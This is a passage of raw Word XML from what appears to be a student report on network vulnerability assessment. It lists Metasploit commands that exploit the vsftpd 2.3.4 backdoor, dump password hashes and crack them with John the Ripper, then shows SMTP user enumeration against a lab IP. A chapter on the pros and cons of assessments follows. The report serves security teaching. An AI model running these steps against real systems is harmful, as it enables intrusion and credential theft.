          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Step 4: Using vsftp backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6AD4DD"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lastRenderedPageBreak/>
        <w:t>&gt; use exploit/unix/ftp/vsftp_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0074F1A3"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&gt;show info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2166BB68" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D30394E" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 5:  Extracting usernames and passwords using hashdump:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E135757"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use post/linux/gather/hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070A795A"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show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DE35E2" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:pStyle w:val="lq"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Step 6: Using John the Ripper to crack the passwords:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C5DDD1"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set SESSION 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDB760A"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show info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4C32AE" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:pStyle w:val="lq"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>&gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F40F6E8" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>$ john .msf4/loot/&lt;filename&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4CF6E0" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35A7CBFD" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01496FDF" w14:textId="58A2925C" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1336D410" wp14:editId="54E10C52">
            <wp:extent cx="4955540" cy="2957830"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12446645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5540" cy="2957830"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="79557202" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E03B92D" w14:textId="77777777" w:rsidR="003E376B" w:rsidRPr="00B65A18" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B65A18">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PORT 110:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE3E1DE" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Step1: Set a telnet connection to the ip address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745CD86A" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>telnet 192.168.1.101 25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E74163" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Step2:  Manually try email user names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC43593" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>VRFY &lt;username&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64483499" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4116B683" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Step3: use enum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F648CC5" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>kali &gt; smtp-user-enum -M VRFY -U &lt;userlist&gt; -t &lt;target IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F79187C" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13AD52B9" w14:textId="60A86A41" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3972247B" wp14:editId="579A973A">
            <wp:extent cx="5396230" cy="2449830"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="10927059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2449830"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA39BF6" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="000B1D31">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6225EF10" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="000B1D31">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FC7C75F" w14:textId="4EA319E9" w:rsidR="000B1D31" w:rsidRDefault="000B1D31" w:rsidP="000B1D31">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CHAPTER 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E387C41" w14:textId="77777777" w:rsidR="000B1D31" w:rsidRDefault="000B1D31" w:rsidP="000B1D31">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ADVANTAGES &amp; DISADVANTAGES:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28037CF1" w14:textId="77777777" w:rsidR="000B1D31" w:rsidRDefault="000B1D31" w:rsidP="000B1D31">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A00E564" w14:textId="77777777" w:rsidR="000B1D31" w:rsidRDefault="000B1D31" w:rsidP="000B1D31">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1085D647" w14:textId="1D147527" w:rsidR="000B1D31" w:rsidRPr="000B1D31" w:rsidRDefault="000B1D31" w:rsidP="000B1D31">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B1D31">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797A26F3" w14:textId="15F82BAB" w:rsidR="000B1D31" w:rsidRPr="000B1D31" w:rsidRDefault="000B1D31" w:rsidP="000B1D31">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E352B37" w14:textId="194D892D" w:rsidR="000B1D31" w:rsidRPr="000B1D31" w:rsidRDefault="000B1D31" w:rsidP="000B1D31">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B1D31">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Risk Mitigation: Vulnerability assessments help in identifying potential security vulnerabilities, allowing organizations to take proactive measures to mitigate risks. By addressing vulnerabilities before they are exploited, organizations can significantly reduce the likelihood and impact of security breaches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C7CF66" w14:textId="77777777" w:rsidR="000B1D31" w:rsidRPr="000B1D31" w:rsidRDefault="000B1D31" w:rsidP="000B1D31">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="646C3D8A" w14:textId="77777777" w:rsidR="000B1D31" w:rsidRPr="000B1D31" w:rsidRDefault="000B1D31" w:rsidP="000B1D31">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B1D31">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Enhanced Security: Assessments provide a comprehensive view of a network's security posture, allowing organizations to identify weak points and implement appropriate security controls. By addressing vulnerabilities, organizations can enhance the overall security of their network infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2781CDE5" w14:textId="77777777" w:rsidR="000B1D31" w:rsidRPr="000B1D31" w:rsidRDefault="000B1D31" w:rsidP="000B1D31">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39C4A036" w14:textId="77777777" w:rsidR="000B1D31" w:rsidRPr="000B1D31" w:rsidRDefault="000B1D31" w:rsidP="000B1D31">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B1D31">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Compliance Requirements: Many industries and regulatory bodies require regular vulnerability assessments to ensure compliance with security standards and regulations. Conducting assessments helps organizations meet these requirements and avoid penalties or legal issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4742FF2C" w14:textId="77777777" w:rsidR="000B1D31" w:rsidRPr="000B1D31" w:rsidRDefault="000B1D31" w:rsidP="000B1D31">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="704426BB" w14:textId="77777777" w:rsidR="000B1D31" w:rsidRPr="000B1D31" w:rsidRDefault="000B1D31" w:rsidP="000B1D31">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B1D31">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Prioritization of Resources: Vulnerability assessments provide insights into the severity and potential impact of identified vulnerabilities. This information enables organizations to prioritize resources and focus on addressing critical vulnerabilities first, thereby optimizing their security efforts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018EB56B" w14:textId="77777777" w:rsidR="000B1D31" w:rsidRPr="000B1D31" w:rsidRDefault="000B1D31" w:rsidP="000B1D31">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AD2897C" w14:textId="77777777" w:rsidR="000B1D31" w:rsidRPr="000B1D31" w:rsidRDefault="000B1D31" w:rsidP="000B1D31">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B1D31">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Awareness and Education: The assessment process can increase awareness among network administrators and IT teams about potential threats and vulnerabilities. It helps educate them about best practices for securing the network and promotes a security-conscious culture within the organization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F13C0E" w14:textId="4F736744" w:rsidR="000B1D31" w:rsidRPr="000B1D31" w:rsidRDefault="000B1D31" w:rsidP="000B1D31">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1699BA82" w14:textId="77777777" w:rsidR="000B1D31" w:rsidRPr="000B1D31" w:rsidRDefault="000B1D31" w:rsidP="000B1D31">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B1D31">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Disadvantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2294C367" w14:textId="77777777" w:rsidR="000B1D31" w:rsidRPr="000B1D31" w:rsidRDefault="000B1D31" w:rsidP="000B1D31">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40190668" w14:textId="77777777" w:rsidR="000B1D31" w:rsidRPr="000B1D31" w:rsidRDefault="000B1D31" w:rsidP="000B1D31">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B1D31">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>False Positives and False Negatives: Vulnerability assessment tools may generate false positives, flagging issues that do not pose actual risks. This can result in wasted time and resources investigating and addressing non-existent vulnerabilities. Conversely, false negatives occur when genuine vulnerabilities are overlooked, potentially leading to security breaches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B17A245" w14:textId="77777777" w:rsidR="000B1D31" w:rsidRPr="000B1D31" w:rsidRDefault="000B1D31" w:rsidP="000B1D31">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74B8E66A" w14:textId="77777777" w:rsidR="000B1D31" w:rsidRPr="000B1D31" w:rsidRDefault="000B1D31" w:rsidP="000B1D31">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B1D31">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Limited Scope: Vulnerability assessments typically focus on known vulnerabilities and may not detect zero-day exploits or emerging threats. This limitation means that new vulnerabilities may go undetected until they are publicly disclosed or exploited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746C56EF" w14:textId="77777777" w:rsidR="000B1D31" w:rsidRPr="000B1D31" w:rsidRDefault="000B1D31" w:rsidP="000B1D31">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B4FF459" w14:textId="77777777" w:rsidR="000B1D31" w:rsidRPr="000B1D31" w:rsidRDefault="000B1D31" w:rsidP="000B1D31">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B1D31">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Complex Networks: Assessing large and complex network infrastructures can be challenging. Identifying vulnerabilities and assessing their impact across a vast network can require significant time, resources, and expertise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455DFF54" w14:textId="77777777" w:rsidR="000B1D31" w:rsidRPr="000B1D31" w:rsidRDefault="000B1D31" w:rsidP="000B1D31">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4219233D" w14:textId="77777777" w:rsidR="000B1D31" w:rsidRPr="000B1D31" w:rsidRDefault="000B1D31" w:rsidP="000B1D31">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B1D31">
        <w:rPr>
          <w:sz w:val="24"/>
